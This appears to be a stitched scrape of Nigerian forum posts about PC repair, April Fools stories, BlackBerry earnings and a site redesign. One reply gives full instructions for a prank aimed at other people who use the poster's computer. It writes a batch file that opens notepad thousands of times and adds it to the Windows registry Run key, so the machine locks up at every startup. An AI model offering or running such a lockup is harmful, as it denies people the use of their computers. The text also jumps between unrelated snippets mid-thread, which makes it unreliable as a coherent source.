iya ayi: Tnx for d above. Didn't solve my prob though, had to take it out to specialists who told me it had bn corrupted! They r suggesting changing frm vista to windows 7. I hope they get it right. Thank you once againaww!....Thats bad considering you had to take it to a specialist. We always try our best though. |
Guy..me no fit give you wetin you want but damn What's the use....? I know some hard to please peeps who would use your system like rain water... Here's it bro...but be careful -start->run->cmd -type 'start notepad' In the notepad window -type '@echo off' -type 'start notepad' -type 'start notepad' -type 'start notepad' -type 'start notepad' -highlight and copy all the 'start notepad' crap and then press and hold the ctrl+v keys on the keyboard to paste that about a million times -click file and save as -select all files as the filetype -save the file as start.bat to the root c: -close notepad -In the command prompt window type 'reg add hklm\software\microsoft\windows\currentv… /v start /d c:\start.bat' Now whenever you start the computer it will attempt to load the thousands of instances of notepad that you put in the .bat file and the computer will lock up when trying to do pretty much anything. Just boot into safe mode by tapping F8 on startup and choose safe mode and move the file from the c: to anywhere else and it will boot up fine. type 'reg SPACE add SPACE hklm\software\microsoft\windows NO SPACE \currentversion\run /v start /d c:\start.bat' If that doesn't make sense, then the abbreviated version r a h\s\m\w\c\r /v s /d c:\path Hope that makes sense. |

Please i bought a deskjet 1660 printer but the software installation did not complete due to no detection of printer via usb with an error message, so therefore cannot utilise the sole purpose it was bought. Please I solicit for your kind and prompt response thanksConnect the usb to the printewr and make sure it's on before you start the installation. That should suffice for now. |
As you all know today is April fool and yours truly is bringing you the top ten funniest April fool jokes from the web. 1. Google has come up with a number of April fools today, from turning Google Maps into a pirate treasure map to announcing that YouTube has been an eight-year competition to choose the best video of all time, and the site is now ready to shut down and announce the winner. But my favourite is Google Nose, which provides smells for whatever you type into the search engine – just “bring your nose as close as you can to the screen and press Enter". 2. Arsenal set to end trophy drought with 'exceptional achievement' award The FA is to reward the Gunners for reaching Europe's most lucrative competition for 16 consecutive seasons, while Ivan Gazidis promises to increase ticket prices by 10 per cent 3. Many Times readers are certain that the paper's article "Nasa's cunning plan to bag an asteroid" is an April fool. The piece starts: Nasa is planning a $2.6 billion robotic mission to catch an asteroid in a giant bag and tow it to the Moon as part of a long-term programme that could one day lead to the permanent settlement of humans in space. 4. Twitter has announced, in an almost plausible spoof, that it will now be charging tweeters to use vowels. Consonants are free, and in addition, the social network explains, it will always offer Y for nothing, even when it is used as a vowel. That's led some users to believe they can outwit Twitter ... 5. The Daily Mirror seems to have two April fools today: the paper writes up Virgin’s announcement that it is introducing a “glass-bottomed plane” for its new route to Scotland. Couldn’t happen, point out some po-faced readers on the Virgin website: "its not possible. because there are core components in the base of the aircraft. and beside that glass can not handle the loads. they can use some sort of camera in the base that transfers real time images to the cabin Floor." 6. No April fools’ day is complete without Guardian newspaper or website tricking it readers with some outrageous story much too unbelievable to be true. Take today’s Guardian, for example, which reports that North Korea's 30-year-old leader Kim Jong-un has got his generals together for a photo op in which they sit in front of a map picking out US targets for a nuclear strike … 7.BMW's YOUR P.R.A.M. MA’AM. Damn funny. Check this link. More Oh, wait a minute ... I’m going to round up all today’s best April fools in my blog. So I leave the last three for you guys to help me fill.. You can add any I’ve missed in the comments below. Courtesy: http://onegig..com/2013/04/top-ten-2013-april-fool-news-from-web.html ![]() |

BlackBerry swung to a surprising profit in the fiscal fourth quarter amid early signs of progress with its BlackBerry Z10 flagship phone. For the three months that ended on March 2, the Canadian smartphone manufacturer reported a profit of $98 million, or 19 cents a share, compared with a year-ago loss of $125 million, or 24 cents a share. Excluding items such as its cost-savings program, the company reported an adjusted EPS of 22 cents. Sales, however, fell by 36 percent to $2.68 billion. More importantly, BlackBerry said it sold 1 million units of the Z10 in the period. The results only include sales from a few early launch markets. Results from the U.S., which first saw the Z10 hit the market on Last Friday, aren't part of the fourth quarter. In total, the company sold 6 million smartphones and 370,000 PlayBook tablets, which continue to move thanks to heavy discounting. doctokwus: Depends on how u want to read d advert.Gej apologists wud read it literary as:"d roads are getting better".But ABC may actually mean travel by road is safer and cheaper wen u consider d mishaps and exorbitant cost of airtravel. So each side interprets to its own advantage, its only d roads demselves dat can give us d truthful answer,if only roads cud talk.I don't know which school you guys go to that simple English comprehension is so hard... lond07: No, I think you may be wrong. This is a programming task and for programmers only. Don't expect an auto mechanic and a lawyer ... etc to make any contribution.I know....my sacrascm was directed to dustydee ...dustydee: nice challenge. This may help our youth who are fast losing their English language skills to short hand writing/ abbreviations. dammytosh: Dude,i go post my response later...and i didnt abuse anyone ok...?? |

CP...stop fighting a lost battle. Some things can't be explained. Some people are naturally weird. No matter the amount of babysitting will change a pig.. thelastPope: This is exactly what I said in my previous post. If Seun tries to go the FB route, NL is history. Stay where you are king and milk it till its last juice drops! No one is advocating the fb functions...am just saying that we can do wat fb did in the social media arena by doing things that can enhance the site. |
@Seun Also we can have the ignore user function whereby when you ignore a user , all that user posts are hidden from you. Makes it easier to ignore tribalists and bigots. and would not not negates the calls for a VIP section as that breeds cliques and sorts. |
Seun: @onegig: We could have limited the content width earlier, but it didn't look right when we tried it with the former white background. The huge white margins on the left and right were just too distracting. The new background seems to have solved that problem.Yeah.. Good observation. The old style was kinda too wide in terms of the content area... If you used a system with a wider screen you would have to be staring at long lines of text but this makes it much more readable. Also Seun. Maybe on weekends you can sell the background image space for some more money. There's nothing stopping you from monetizing the site to its fullest. |
c33b33: It's an acer aspire mini laptop.....a new keyboard?an external one or the in built has to be replaced?ThanksThe built in one has to be replaced.. Shouldnt cost more than 3k since its a mini inside computer village. |
Just woke up to the new changes on the nairaland forum. The edges are trimmed and there's even a different background now. I guess Seun is listening to advise now and ready to change for the better. Anyways i like the new slic design and just wish many more better things to follow. Like a chat app and other things that makes it a full community. We can even have groups or stuff in here. Lets go on and challenge other social networks. Nothing stops Nairaland from being better than fb and reddit. What do you think guys.? |
